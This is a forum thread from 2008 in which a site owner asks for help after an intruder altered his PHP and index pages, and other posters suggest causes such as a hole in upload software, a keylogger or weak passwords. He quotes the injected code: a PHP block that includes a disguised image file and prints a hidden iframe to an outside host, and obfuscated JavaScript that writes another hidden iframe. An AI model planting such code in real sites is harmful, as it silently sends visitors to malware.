Another Hacker modified my .php files and index.php pages

[wazimm]

I noticed my site was giving me a "500" internal server error. I quickly looked at the error_log and I got the following:

SoftException in Application.cpp:238: File "/home/jhustler/public_html/superhaitian/index.php" is writeable by group
[Thu May 1 02:52:04 2008] [error] [client 66.249.65.37] Premature end of script headers: /home/jhustler/public_html/superhaitian/index.php
SoftException in Application.cpp:238: File "/home/jhustler/public_html/superhaitian/index.php" is writeable by group
[Thu May 1 02:51:01 2008] [error] [client 66.229.122.175] File does not exist: /home/jhustler/public_html/muziklakay/favicon.ico
[Thu May 1 02:48:21 2008] [error] [client 65.8.168.56] File does not exist: /home/jhustler/public_html/muziklakay/crossdomain.xml
[Thu May 1 02:48:14 2008] [error] [client 66.249.65.37] Premature end of script headers: /home/jhustler/public_html/superhaitian/index.php
SoftException in Application.cpp:238: File "/home/jhustler/public_html/superhaitian/index.php" is writeable by group
[Thu May 1 02:48:14 2008] [error] [client 66.249.65.37] Premature end of script headers: /home/jhustler/public_html/superhaitian/index.php
SoftException in Application.cpp:238: File "/home/jhustler/public_html/superhaitian/index.php" is writeable by group
[Thu May 1 02:47:36 2008] [error] [client 66.229.122.175] Premature end of script headers: /home/jhustler/public_html/superhaitian/index.php

Next I visit a few of the .php files and almost all of them had the following lines added :

<?php

error_reporting(0);

if (file_exists("/home/jhustler/public_html/superhaitian/media/albums/userpics/10001/45563131x.jpg")) {

include("/home/jhustler/public_html/superhaitian/media/albums/userpics/10001/45563131x.jpg");

} else

if (ini_get("register_globals")) {

if($GLOBALS["fx"]==0) {

$GLOBALS["fx"]=1;

echo "<iframe src='http://ccfelomvhk.com/dl/adv542.php' width=1 height=1></iframe>";

}

} else {

echo "<iframe src='http://ccfelomvhk.com/dl/adv542.php' width=1 height=1></iframe>";

}

?>

In some index.php files

<!-- ~ --><script language=javascript>document.write(unesc ape('%3C%73%63%72%69%70%74%20%6C%61%6E%6 7%75%61%67%65%3D%22%6A%61%76%61%73%63%72 %69%70%74%22%3E%66%75%6E%63%74%69%6F%6E% 20%64%46%28%73%29%7B%76%61%72%20%73%31%3 D%75%6E%65%73%63%61%70%65%28%73%2E%73%75 %62%73%74%72%28%30%2C%73%2E%6C%65%6E%67% 74%68%2D%31%29%29%3B%20%76%61%72%20%74%3 D%27%27%3B%66%6F%72%28%69%3D%30%3B%69%3C %73%31%2E%6C%65%6E%67%74%68%3B%69%2B%2B% 29%74%2B%3D%53%74%72%69%6E%67%2E%66%72%6 F%6D%43%68%61%72%43%6F%64%65%28%73%31%2E %63%68%61%72%43%6F%64%65%41%74%28%69%29% 2D%73%2E%73%75%62%73%74%72%28%73%2E%6C%6 5%6E%67%74%68%2D%31%2C%31%29%29%3B%64%6F %63%75%6D%65%6E%74%2E%77%72%69%74%65%28% 75%6E%65%73%63%61%70%65%28%74%29%29%3B%7 D%3C%2F%73%63%72%69%70%74%3E'));dF('%264 Dtdsjqu%2631mbohvbhf%264Ekbwbtdsjqu%264F %261E%261Bepdvnfou/xsjuf%2639%2633%264Djgsbnf%2631tsd%264E% 2638iuuq%264B00xxx/gsff31/dpn0qpsubm0joefy/qiq%264Gbgg%264Esb%7Bfdd%2638%2631xjeui% 264E%26381%2638%2631ifjhiu%264E%26381%26 38%2631gsbnfcpsefs%264E%26381%2638%264F% 264D0jgsbnf%264F%2633%263%3A%261E%261B%2 64D0tdsjqu%264F1')</script><!-- ~ -->

This is clearly a security problem. WHat could have gone wrong and how can I fix it?

[wazimm]

I just remembered posting about this problem last year and there were others that had the same problem. This is the old thread Hacker Attack

[the_ancient]

I just remembered posting about this problem last year and there were others that had the same problem. This is the old thread Hacker Attack

That is good that your remember the post, did you follow any of the advice contained in it?


From the Fact the script is looking in what appears to be a public upload area, I am willing to beat that your site was compromised by a security hole in what ever software package you run your site one,

[Pawel Kowalski]

I haven't had time to read through that thread you posted but one of my customers on my VPS was attacked the same way. They ran nothing but static HTML files so it had nothing to do with scripts. I think this is related to a keylogger on the target machine. If this was a server wide problem all sites on my end would have been affected, but only the 2 sites my customer had were attacked.

[the_ancient]

I haven't had time to read through that thread you posted but one of my customers on my VPS was attacked the same way. They ran nothing but static HTML files so it had nothing to do with scripts. I think this is related to a keylogger on the target machine. If this was a server wide problem all sites on my end would have been affected, but only the 2 sites my customer had were attacked.

Or they could just use unsecure passwords.....

Most people do not use secure passwords, hell even I get lazy will use some less than secure passwords but even my "lazy" ones are above average...